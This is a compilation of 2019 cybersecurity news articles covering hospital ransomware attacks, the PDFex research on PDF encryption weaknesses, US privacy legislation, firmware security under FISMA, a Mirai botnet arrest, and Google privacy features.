STE WILLIAMS

Major hospitals and some health clinics in the US and Australia have been crippled in new ransomware attacks, forcing some into emergency manual mode and one to close permanently due to extensive loss of patient healthcare records encrypted by data kidnappers.

In Australia, the toll is seven hospitals. According to an advisory issued on Tuesday by Victoria’s Department of Premier and Cabinet, a ransomware attack discovered on Monday has blocked access to several key systems, including financial management.

The hospitals and health services, which are located in Gippsland and south-west Victoria, have isolated a number of systems, taking them offline so as to quarantine the infection.

Isolating the systems has led to the shutdown of some patient record, booking and management systems, which may affect patient contact and scheduling. Where practical, some of the hospitals are reverting to manual systems to maintain patient services.

Loss of access to patient histories, charts, images and other information has forced the hospitals to rework bookings and scheduling so as to minimize disruption of service.

Meanwhile, in the US, three medical centers in western Alabama said this week that they’re not taking new patients due to a ransomware attack. According to a press release put out on Tuesday, elective procedures and surgeries scheduled for the next day – Wednesday, 2 October – would be going ahead as planned, with the centers running on “downtime” procedures that they say enable them to provide “safe and effective care” for those patients.

Current patients are staying put: they’re not being transferred to other medical centers. New admissions for critical cases are being diverted to other facilities, however. As for tests and other procedures, patients are being advised to call before they show up.

Encrypted to death

In related news, the crooks managed to kill one goose in the process of trying to get its golden eggs. A California medical practice that suffered a ransomware attack in early August announced on 18 September that patients’ personal healthcare data on both servers and backup hard drives were encrypted in the attack, and that it hasn’t been able to restore the records. As a result, it’s closing: the clinic will be out of business as of 17 December 2019.

There’s no sign yet that patient information was accessed, the center said, but it has notified patients and provided resources to assist them, including information about credit monitoring from credit reporting agencies and a toll-free call center to answer questions about the incident and related concerns.

What are they after?

The California medical center thinks that, possibly, it’s not the data the crooks were after. Rather, it’s just the cold, hard cash:

We believe it is likely the attacker only wanted money and not the information on our computers.

That could be wishful thinking, though, particularly given the data that was accessed:

While we have no reason to believe that anyone’s healthcare information was taken, the encrypted system contained electronic healthcare records which included patients’ names, addresses, dates of birth, medical insurance and related health information.

Medical records are valuable commodities on the dark web. Multiple studies have shown that healthcare is attacked more than any other industry, and it’s easy to see why: simply put, because that’s where the money is.

The profit can come through ransomware payments or by selling extremely profitable medical records.

According to account monitoring company LogDog, coveted Social Security Numbers were selling on the dark web for a measly $1 in 2016 – the same as a Facebook account. That pales in comparison with the asking price for medical data, which was selling for $50 and up.

Healthcare IT is just like every other kind, except it’s more critical. Lives are always at stake when it comes to access to healthcare IT, making the possibility of ransomware payments far more likely.

Responses

In Australia, the Victorian Government advisory said that Victoria Police and the Australian Cyber Security Centre are helping out the affected hospitals. The Victorian Cyber Incident Response Service – a service available 24/7 to respond to cyber-attacks on government computer systems – worked through the night to investigate the extent of server damage and to help the health centers respond to the attack.

As of Wednesday morning, the crook(s) who launched an attack on the medical centers in western Alabama hadn’t yet made a ransom demand.

A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment.

The centers didn’t say whether they’d pay up or not, but one assumes that the answer will be “go take a hike,” given that they’ve called in the Feds to work with their IT staff and that they’re working with vendors and consultants to restore their systems.

To pay or not to pay, that is the question

That’s always the question in a ransomware attack: Should an organization cough up the money? Or should it tough it out, knowing that lining the attackers’ pockets only encourages them to attack other mission-critical systems, be they at hospitals or government agencies? … and that paying is no guarantee that the crooks won’t come back to gouge away more?

There appears to be a growing trend for victims to tell attackers they’re not playing ball. That’s what the US Conference of Mayors did in July, crafting a resolution calling on cities to not pay ransom to cyberattackers.

It’s non-binding, of course. Sometimes, organizations – most particularly in the healthcare sector – feel that they have little choice but to pay up. That’s not a good place to be, and there are things that can and must be done to help keep them from getting stuck like that.

How to protect yourself from ransomware

• Pick strong passwords. And don’t re-use passwords, ever.
• Make regular backups. They could be your last line of defense against a six-figure ransom demand. Be sure to keep them offsite where attackers can’t find them.
• Patch early, patch often. Ransomware like WannaCry and NotPetya relied on unpatched vulnerabilities to spread around the globe.
• Lock down RDP. Criminal gangs exploit weak RDP credentials to launch targeted ransomware attacks. Turn off RDP if you don’t need it, and use rate limiting, 2FA or a VPN if you do.
• Use anti-ransomware protection. Sophos Intercept X and XG Firewall are designed to work hand in hand to combat ransomware and its effects. Individuals can protect themselves with Sophos Home.

For information about how targeted ransomware attacks work and how to defeat them, check out the SophosLabs 2019 Threat Report.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/D-Zw_aOxTlU/

Google has taken the next step in its strategy to secure users’ passwords. The search giant has taken a password-checking feature released early this year as an extension to its Chrome browser and embedded it directly into its password manager service.

In February, the search and advertising giant released Password Checkup, a Chrome extension that checks passwords to see if they are secure. When users enter a username and password, the extension checks a hashed version of the credentials against Google’s internal database of four billion unsafe logins. If the extension finds a match, it will warn the user and suggest that they reset their password.

Now, the company has decided to integrate this feature directly into its password manager, which is the feature in Chrome that asks if you want to save the login credentials for online services and reuse them later.

The password manager is also available via a web interface, and it’s this online version that Google has updated with the new password checkup service. It scans your stored account credentials for three things: if they’ve been compromised, if they’ve been reused in more than one place, and if they’re weak. The check takes a couple of seconds and spits out a handy report.

This is a useful service, but it’s still one step away from flagging compromised passwords directly in the browser without any add-ons. That’s coming, though. A password alert system will reportedly warn the user if they enter website credentials that have turned up in Google’s database of compromised logins. It’s already available as a feature in the Canary release of Chrome 78, but users need to download that manually until the release becomes mainstream. They also need to manually enable the feature.

Google’s move shadows Firefox’s inclusion of a scanning service for saved logins in Firefox 70. That service checks against Troy Hunt’s Have I Been Pwned (HIBP) service, though, whereas Google’s online password checking service references its own database, gleaned from sources including the open web and the dark web.

There’s a strong need for these password checking mechanisms. In August, Google released a study of data from the Password Checkup extension, revealing that 1.5% of web logins use breached credentials. That might not sound like much, but it represents breached credentials on over 746,000 distinct domains.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/htCIKPrCE8I/

You would be forgiven for thinking that encrypting PDFs, before they are stored or sent via email, keeps their contents away from prying eyes.

But according to researchers in Germany, it might be time to revisit that assumption after they discovered weaknesses in PDF encryption which could be exploited to reveal the contents of a file to an attacker.

Dubbed ‘PDFex’ (PDF exfiltration), the weaknesses documented in Practical Decryption exFiltration: Breaking PDF Encryption by researchers from Ruhr University Bochum and the Münster University of Applied Sciences, offer two attack methods, each with three variants that depend on which PDF viewer is used to open a target document.

Attack #1 – direct exfiltration

The PDF standard ships with native AES symmetric encryption which secures documents using a password communicated to the recipient (arguably a weakness in itself) or, in some installations, through public key encryption.

However, the researchers quickly discovered a hole in this method, so glaringly obvious that it’s surprising nobody’s noticed it before. The PDF standard allows for partially encrypted documents that include a mix of both encrypted and unencrypted sections, and does not include integrity checking. This means an attacker can add additional sections or interactive Actions to an encrypted PDF without raising any alarms, said the researchers in their overview:

The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript.

Actions can be set to run when a document is opened or something within the document is clicked on, and send the decrypted contents to an attacker’s server.

Although conceptually simple, using something like PDF form submission or JavaScript to do this turns out to be complex.

First, the attacker would need to intercept or obtain a copy of the PDF in order to insert the pointers, and would need a channel through which to exfiltrate the stolen data without that being noticed, detected or blocked.

Another unpredictable limitation is the way numerous different PDF viewers process things like JavaScript in order to enforce security.

Attack #2 – CBC gadgets

Because not all PDF viewers support unencrypted content in PDFs, the researchers tried a more involved technique that exfiltrates plaintext by manipulating the PDF’s cipher block chaining (CBC) encryption format using something called ‘malleability gadgets’.

In this attack, the researchers exploit the lack of integrity protection to modify the encrypted contents directly:

…an attacker can stealthily modify encrypted strings or streams in a PDF file without knowing the corresponding password or decryption key. In most cases, this will not result in meaningful output, but if the attacker, in addition, knows parts of the plaintext, they can easily modify the ciphertext in a way that after the decryption a meaningful plaintext output appears.

…

Fortunately – from an attacker’s point of view – the PDF AESV3 (AES256) specification defines 12 bytes of known plaintext…

The researchers tested both techniques against 27 popular PDF viewers and editors to see how successful they would be under real-world conditions, finding a surprising amount of variation between programs.

Nevertheless, all 27 were vulnerable to at least one variant on either attack method, including Adobe Acrobat, Foxit Reader, Evince, Okular, Chrome, and Firefox.

What does this mean?

As with other formats that share some of the PDF’s security characteristics (XML, S/MIME, and ePub for instance), there is clearly some work to do in terms of AES-CBC’s integrity protection.

This must be fixed in future PDF specifications and any other format encryption standard, without enabling backward compatibility that would re-enable CBC gadgets.

Thanks to the widespread use of TLS encryption, it would be difficult for attackers to intercept and modify PDFs as they move across a network or the internet, whether the documents themselves are encrypted or not. However, PDFs at rest have been shown to be vulnerable.

If you think it’s worth encrypting your PDFs and you want to be sure they haven’t been tampered with, use a respected third party encryption tool, like GPG.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/yigSKdsoe6I/

You know about that one, much-hemmed-and-hawed-over, GDPR-ish, national, US privacy law? The one we don’t have? The lack of which means the country’s data privacy landscape is made up of a crazy quilt of state laws?

Not happening. Not this year.

In spite of the US Federal Trade Commission (FTC) marching down to Capitol Hill to beat the drum for a unified federal privacy law (and more regulatory powers to enforce it), and in spite of both the House and Senate holding hearings on privacy legislation, transparency about how data is collected and shared, and the stiffening of penalties for data-handling violations, the US is not likely to see an online privacy bill come before Congress this year.

That’s according to Reuters’ anonymous sources, who say that lawmakers haven’t managed to agree on issues such as whether the bill would preempt state rules.

And when we’re talking about state rules, we’re talking about the elephant in the room: California’s Consumer Privacy Act (CCPA), which goes into effect on 1 January 2020.

In lieu of a federal law – the one we’re not getting this year because nobody can agree on what it should do – the CCPA might turn into the ipso facto privacy rule of the land. Tech companies are terrified that it’s going to be strict, and it’s going to be expensive for all the companies that slurp up consumer data to track us, market at us and profit from selling our data …Or which screw up by fumbling that data, or which quietly pickpocket that data, as the case may be.

In hearings over possible privacy legislation – which neither you nor I have been invited to, fellow citizen, though tech companies have – lawmakers and online advertising representatives have grumbled about tough laws such as the CCPA and the EU’s General Data Protection Regulation (GDPR), saying that such strict laws could lead to businesses being swamped by fines and compliance costs, and that consumers have been buried in a blizzard of required notices and privacy policies they don’t bother to read.

During a Congressional hearing in February 2019, this is what Dave Grimaldi, executive vice president for public policy at Interactive Advertising Bureau, had to say about the CCPA’s requirement that businesses have to hand over consumers’ data when requested:

[If a business doesn’t meet the timeline], it is in the violation of the law. [Given the potential for thousands of requests,] that’s something smaller companies wouldn’t be able to deal with.

Without a federal law to save them from having to submit to the California law, tech companies, retailers, advertising firms and others dependent on collecting consumer data to track users and increase sales – think Google, Amazon, Facebook or Walmart, to name just a few – are worried that the strict requirements of the CCPA are going to tear a hole in their corporate pockets. They all collect data on shoppers, whether it’s to run their sites or to derive online data in order to provide “free” services in exchange for advertising at us.

Reuters quoted Gary Kibel, a partner specializing in technology and privacy at law firm Davis Gilbert, who said that complying with California law will be quite a challenge for such companies:

This will be tremendously challenging… companies need to really focus on complying with California now because there is not going to be a life raft from a federal level.

Sources involved in legislation negotiations told Reuters that a discussion draft might arrive before year’s end, but these are some of the issues still to be ironed out:

• Is it sufficient to simply ask consumers to consent to collection of personally identifiable information (PII) and to give them the opportunity to opt out?
• How will the new law be enforced?
• How much information should be deemed private?
• How should the law govern how consumer information gets shared with third parties?

A draft of the federal bill is expected to be released before year’s end, sources said. A draft of the House version of the bill could arrive within a few weeks, one source said.

The GDPR-ish CCPA

California’s law isn’t just for California businesses, of course. Businesses that do business or have customers, or potential customers, in California will still be on the hook, if they meet one of these criteria:

• Have an annual gross revenue more than $25 million.
• Receives, shares, or sells personal information of more than 50,000 individuals.
• Earns 50% or more of its annual revenue from selling personal information of consumers.

Consumers’ rights under CCPA can be grouped into these general categories:

1. Businesses must inform consumers of their intent to collect personal information.
2. Consumers have the right to know what personal information a company has collected, where the data came from, how it will be used, and with whom it’s shared.
3. Consumers have the right to prevent businesses from selling their personal information to third parties.
4. Consumers can request that businesses remove their personal information.
5. Businesses are prohibited from charging consumers different prices or refusing service, even if the consumer exercised their privacy rights.

We’re still waiting for California’s attorney general to issue regulations about the law, but we do know that each violation carries a $7,500 fine.

One of Reuters’ sources who’s pushing for a federal privacy law said that without it, the CCPA is going to hurt:

California will go into effect without Congress doing anything this year on the federal bill. That’s a big problem because of the business impact this will have.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Pjj93Rj42bA/

A new mobile app makes a cybersecurity threat lab available to more small businesses in Los Angeles.

Electricity. Water. Law enforcement. These are services companies and individuals expect to receive from municipal governments. The City of Los Angeles is adding another service to the list: cybersecurity intelligence. And some think the project by the City of Angels could be the model for other US cities to emulate in expanding the services they offer to their own citizens.

Since August 2017, the LA Cyber Lab has been providing cybersecurity assistance to small and midsize businesses in the city. By sharing threat information and providing training opportunities, the Cyber Lab has tried to provide smaller organizations with some of the cybersecurity advantages that larger organizations can afford.

In the first two years of the Lab’s operation, it built a standardized platform for accepting information from participating organizations and automating threat analysis reporting to those companies. Hundreds of organizations have participated in the program that Los Angeles Mayor Eric Garcetti, who chairs the Lab’s board of advisers, has said is critical for addressing cybersecurity with the appropriate sense of urgency.

Now the Cyber Lab has expanded its capabilities and mission with the introduction of a mobile platform that can be accessed by businesses and individuals.

“We’ve got a mobile platform that citizens can log onto, can become members [of the LA Cyber Lab], and ultimately do things like submit pieces of mail that might be suspicious and then actually get information back that typically would only be shared more in a corporate setting,” says Wendi Whitmore, vice president of X-Force Threat Intelligence at IBM Security.

IBM Security is a partner in the Cyber Lab. While there is obviously a financial relationship, Whitmore says each enjoys side benefits from IBM’s participation in other ways. IBM Security provides the analytical platform the lab uses for generating its reports, and Whitmore says the data from Cyber Lab clients enhances the global data set X-Force analysts use in their work.

For the past two years, clients have been able to share internal company data — like login data, internal Web traffic, and user account activity — with the Cyber Lab. In the workflow until last month, Lab analysts would then review the shared data, looking for various indicators of compromise, such as data that shows a compromised user account or phishing links in email messages.

Notice of a compromise would then be sent in an email message — one of a series of email messages sent approximately five times a week. With the new mobile and Web-based system, messages can be forwarded via an app to the lab, which will then notify the client of compromise via the app within a few hours.

All of the analysis and threat indication is provided at no cost to businesses in Los Angeles. In conversations at Black Hat USA 2019, lab management stressed that the lab and its free nature is a recognition of the importance of small businesses in the economy of the city. And that importance is not limited to Los Angeles.

“I think the goal for everyone in this project is it really becomes a great example and a benchmark for other cities to learn from and take on,” Whitmore says. While there are other municipal cybersecurity programs, like New York City’s Cyber NYC, most of these focus on growing the local cybersecurity industry and workforce, not protecting local small businesses.

As threats like ransomware become more devastating for small businesses and small government units, other governments may well look to Los Angeles as a model. The real question may be which governments can afford to offer this particular service to their citizens — and which groups of citizens are willing to pay for the service through their taxes.

Related Content:

• New Emergency Communications Plan Released by CISA
• ‘It Saved Our Community’: 16 Realistic Ransomware Defenses for Cities
• A Safer IoT Future Must Be a Joint Effort
• How Ransomware Criminals Turn Friends into Enemies
• 8 Ways to Spot an Insider Threat

 

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/theedge/how-the-city-of-angels-is-tackling-cyber-devilry/b/d-id/1335968?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Feeling creative? Submit your caption in the comments, and our panel of experts will reward the winner with a $25 Amazon gift card.

Submit your caption in the comments, and our panel of experts will reward the winner with a $25 Amazon gift card. The contest ends Oct. 31. If you don’t want to enter a caption, help us pick a winner by voting on the submissions. Click thumbs-up for those you find funny; thumbs-down, not so. Editorial comments are encouraged and welcomed.

Click here for contest rules. For advice on how to beat the competition, check out How To Win A Cartoon Caption Contest.

 

John Klossner has been drawing technology cartoons for more than 15 years. His work regularly appears in Computerworld and Federal Computer Week. His illustrations and cartoons have also been published in The New Yorker, Barron’s, and The Wall Street Journal.
Web site: … View Full Bio

Article source: https://www.darkreading.com/edge/theedge/cartoon-contest-second-wind/b/d-id/1335961?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Federal guidelines can help all organizations pragmatically and meaningfully improve their firmware security.

Adversaries recently have noticed that firmware and hardware constitute a serious blind spot for most organizations. While firmware may have once been the domain of nation-state attackers, it’s now easier than ever for criminals to develop firmware-based attacks that bypass security and cause serious (even permanent) damage. While advances in firmware security mean that organizations no longer need specialized talent or manual analysis to protect their firmware, a risk remains.

Enter the Federal Information Security Management Act, or FISMA. While FISMA applies mainly to government agencies and companies doing business with the government, it is based on NIST standards that provide guidance on best practices for all organizations. It’s guidance on firmware is worth the attention of both government and nongovernmental security and risk management teams. (Editor’s note: Eclypsium is one of several vendors that market firmware protection products.)

First and foremost, firmware clearly falls well within scope for FISMA compliance. The regulation’s far-reaching requirements are spelled out in two NIST documents. SP 800-37 lays out a Risk Management Framework (RMF), and SP 800-53 addresses Security and Privacy Controls. Both NIST documents identify firmware as a critical part of a security program. In fact, they consistently include firmware along with hardware and software when describing the components of technology and devices to be protected. The question isn’t whether to include firmware in a security program, but which firmware to include.

Understanding the Threat and Scope
In the first phase of the RiskManagementFramework (RMF) Overview (“Prepare”), organizations are called to define their high-level risk strategy based on their unique mission, tolerance for risk, types of threats such as cyberattacks, and other factors. Given their high-risk level, firmware security threats should be considered as part of these efforts. This requires an understanding of the scope and severity of these threats.

Firmware is the foundational code of a device. System firmware such as BIOS or UEFI runs before the operating system. Threats at this level can subvert security controls and assumptions made by the operating system or applications.

Firmware is also present in virtually every piece of hardware in a computer system, from the storage drives to the network adapters. Attackers have plenty of opportunity to eavesdrop on data stored on a system or transmitted over its network connections, or to disable the device altogether — all at the firmware level. To further exacerbate the problem, firmware threats subvert traditional security controls and survive common incident response processes. For example, attackers can persist in the firmware even if the operating system is reinstalled to a known, good version. All of this adds up to a high potential impact on a system’s confidentiality, integrity, and availability.

Choosing Security Controls for Firmware
Once agencies identify the systems to be protected, they must implement the proper security controls, as enumerated in NIST SP 800-53. The following families of security and privacy controls identified in the document may naturally apply to firmware security:

• SI–System and Information Integrity
• SA-Systems and Services Acquisition
• CM-Configuration Management
• AC-Access Control
• RA-Risk Assessment
• IR-Incident Response
• MA-Maintenance

A Call to Arms
Many of the controls specifically call out firmware security. For example, Configuration Management states the importance of only using updates that are cryptographically signed. As examples, the document identifies “firmware version updates, patches, service packs, device drivers, and basic input output system (BIOS) updates.”

Control SI-7 also addresses firmware, along with software and information integrity. The Control specifically addresses the need to ensure the integrity of the system boot process as well as the integrity of the boot firmware.

Section MA-3 of SP 800-53 also demands that organizations consider firmware security. This time, in respect to the tools administrators use to service a system. According to the document, maintenance tools can include hardware, software, and firmware items that are “potential vehicles for transporting malicious code, intentionally or unintentionally, into a facility and subsequently into systems.”

Firmware is explicitly within the scope of FISMA. More importantly, because of ongoing efforts across the industry, the cost of including firmware protections into a security program is now lower than ever. With open source and commercial tools available, organizations can now deploy firmware security at scale in the supply chain, in operations, and in incident response. Armed with an understanding of the severity and scope of the firmware threat, organizations can determine the proper controls required to comply with FISMA and — perhaps more importantly — strengthen their firmware security in a noticeable, practical way.

Related Content:

• Firmware: A New Attack Vector Requiring Industry Leadership
• Unsecured IoT: 8 Ways Hackers Exploit Firmware Vulnerabilities
• Meet FPGA: The Tiny, Powerful, Hackable Bit of Silicon at the Heart of IoT

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “How the City of Angels Is Tackling Cyber Devilry.”

John is VP RD at Eclypsium, the industry’s leading enterprise firmware protection platform. John has extensive history in hardware and firmware threats from experience at Intel and the United States government. At Intel he served as the Director of Advanced Threat Research, … View Full Bio

Article source: https://www.darkreading.com/risk/how-fisma-requirements-relate-to-firmware-security-/a/d-id/1335913?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

An unprotected Elasticsearch cluster contained personally identifiable information on Russian citizens from 2009 to 2016.

A database holding more than 20 million Russian tax records was found unprotected, leaving personal tax data accessible to anyone with a web browser, researchers reported this week.

The AWS Elasticsearch cluster contained data on Russian citizens spanning 2009 to 2016, according to Comparitech, which partnered with security researcher Bob Diachenko to investigate the leak. No password or any authentication was needed to access the cluster, which has now been taken offline. Researchers cannot confirm whether data was taken.

Multiple databases were stored in the cluster. Some held random and publicly sourced data; two held tax data and personally identifiable information about Russian citizens, most of them from Moscow and the surrounding area. One database had more than 14 million personal and tax records from 2010 to 2016; another had more than 6 million records from 2009 to 2015.

The records held information including full name, address, residency status, passport number, phone number, tax ID number, employer name and phone number, and tax amount. None of the data was encrypted, researchers report, and it was left exposed for more than a year.

Read more details here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “How the City of Angels Is Tackling Cyber Devilry.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/20m-russians-personal-tax-records-exposed-in-data-leak/d/d-id/1335984?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Dutch police said in a translated news release that they have busted a local ‘bulletproof’ server hosting operation in a major takedown that also nabbed a pair of Mirai botnet operators.

The Netherlands’ National Criminal Investigation Department and National Cyber Security Center operated jointly to track down and seize five servers that they say were being used as an underground ‘bulletproof’ hosting service for criminals.

The servers, housed at an unnamed data center in Amsterdam, had been the subject of thousands of complaints of malware infections as their operators had used the boxes to run exploits and control infected machines.

In this case, the police say, the people controlling those servers were a pair of Dutch nationals who had been running a Mirai botnet with cover from the bulletproof host. The duo, a 24 year-old man from Veendam and a 28 year-old man from Middelburg, had been offering the network of Mirai-infected devices as a for-hire distributed denial of service tool.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device,” the translated police statement reads.

“Which DDoS attacks can be attributed to this botnet is part of the further investigation.”

Mirai botnet malware offspring graduates from uni, puts on a suit, slips into your enterprise

READ MORE

Police said they plan to charge the pair with crimes including, but not limited to, computer intrusion and spreading malware. The cops hope that, by seizing the servers, they can take down this botnet once and for all.

The bust-up of a locally-based bulletproof host (a term used for server providers who don’t ask questions of their customers and typically ignore takedown requests) should also prove significant.

While shady hosting operations have typically been associated with poorer, strife-ridden areas that have little in the way of government and police oversight, there are a number of advantages to having a bulletproof host located nearby in a major city, including reliability and lower latencies, that would make the Amsterdam datacenter a hot commodity with local cybercriminals.

Meanwhile, users and admins who are worried about falling victim to Mirai and other botnet malware should first reset the device to get rid of any locally running code, then make sure they have changed default passwords and double-checked their firewall settings and updated all firmware. ®

Sponsored:
Beyond the Data Frontier

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/10/03/dutch_cops_bust_mirai/

After last year acknowledging that Google Maps stores location data even when told not to, the Chocolate Factory plans to give Maps the same misunderstood form of privacy offered by its Chrome browser, otherwise known as Incognito mode.

“When you turn on Incognito mode in Maps, your Maps activity on that device, like the places you search for, won’t be saved to your Google Account and won’t be used to personalize your Maps experience,” said Eric Miraglia, director of product management in Google’s privacy and data protection office, in a blog post.

Incognito mode, coming to Google Maps for Android this month and Google Maps for iOS “soon,” will pause real-time location sharing, as well as relevant notifications. It will prevent updates to users’ Location History and any Maps personalization. But it won’t provide the freedom from scrutiny implied by its name.

Just as Chrome’s Incognito mode offers only partial privacy – it prevents Chrome from saving browser activity but does nothing to prevent websites, network operators and internet service providers from tracking browsing activity – Maps Incognito mode won’t stop ISPs, apps, voice search or other Google services from capturing location data, if granted permission or able to do so regardless. And it won’t stop the selling of location data.

The Register asked Google how Maps Incognito mode might affect the kind of information it could turn over to authorities if presented with a lawful demand for data. According to the internet titan, it would not be able to provide Location History Data from a mobile device using Incognito mode. But as this feature is device specific, other gadgets on the same Google Account may be able to provide location data if the user has opted to enable Location History for the account. And the web giant could still produce other types of data that could be used to derive an approximate location (an IP address, for example) if required to do so under a valid legal process, as detailed here.

If your threat model fear is that other people who might use your device and shudder at your shameful travels, then Maps Incognito mode may help. If your concern is surveillance capitalism and the ad-industrial complex, this isn’t the privacy you’re looking for.

Maps’ newfound sense of modesty comes amid Google’s broader effort to shore up security and privacy across its various platforms, even as it lobbies against privacy regulation.

Google takes sole stand on privacy, rejects new rules for fear of ‘authoritarian’ review

READ MORE

YouTube is also showing signs of data shame. After adding a data retention setting to the Location History and Web App Activity records in Google Accounts in May, the Chocolate Factory has just extended auto-deletion to YouTube History. Video watchers can now select a data retention period of three months, 18 months or manual deletion – for those who prefer to wait until investigators are knocking at the door.

Meanwhile, Google has taken its Password Checkup extension and baked it into the password manager it offers through Chrome and Google Accounts. Password Checkup will check to see whether user passwords have shown up in public password dumps, whether they’re weak and whether they’ve been reused across multiple sites.

Consistent with Google’s newfound sensitivity about info hoarding, Google Assistant will soon be empowered to delete data on demand, though only a week’s worth.

“In the coming weeks, you’ll be able to delete Assistant activity from your Google Account just by saying things like ‘Hey Google, delete the last thing I said to you’ or ‘Hey Google, delete everything I said to you last week,'” said Miraglia.

If you want to delete more than a week’s worth of smart speaker banter, Google Assistant will balk and direct you to do it yourself through your Google Account. The fun begins next week for English users and next month in other languages. ®

Sponsored:
Your Guide to Becoming Truly Data-Driven with Unrivalled Data Analytics Performance

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/10/02/google_maps_incognito/